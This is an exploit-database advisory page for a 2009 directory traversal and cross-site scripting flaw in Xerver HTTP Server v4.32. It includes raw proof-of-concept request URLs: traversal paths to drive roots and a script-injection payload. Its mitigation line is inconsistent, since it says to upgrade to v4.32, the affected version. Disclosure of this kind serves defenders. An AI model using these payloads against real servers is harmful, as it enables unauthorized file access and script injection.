header-logo
Suggest Exploit
vendor:
HTTP Server
by:
Stack
8.8
CVSS
HIGH
XSS / Directory Traversal
22 (Path Traversal) and 79 (Cross-site Scripting)
CWE
Product Name: HTTP Server
Affected Version From: v4.32
Affected Version To: v4.32
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Xerver HTTP Server v4.32 XSS / Directory Traversal Vulnerability

A directory traversal vulnerability exists in Xerver HTTP Server v4.32. An attacker can exploit this vulnerability to traverse directories and execute arbitrary code on the vulnerable system. An attacker can also exploit this vulnerability to inject malicious JavaScript code into the vulnerable system.

Mitigation:

Upgrade to the latest version of Xerver HTTP Server v4.32 or later.
Source

Exploit-DB raw data:

Xerver HTTP Server v4.32 XSS / Directory Traversal Vulnerability


By Stack


Directory Traversal Exploit :

http://127.0.0.1:32123/action=chooseDirectory&currentPath=d:%5C

http://127.0.0.1:32123/action=chooseDirectory&currentPath=c:\




XSS Exploit :


http://127.0.0.1:32123/action=chooseDirectory&currentPath='">><script>alert('XSS By Stack')</script>

# milw0rm.com [2009-09-18]

Navigation

Suggest Exploit

Services By CQR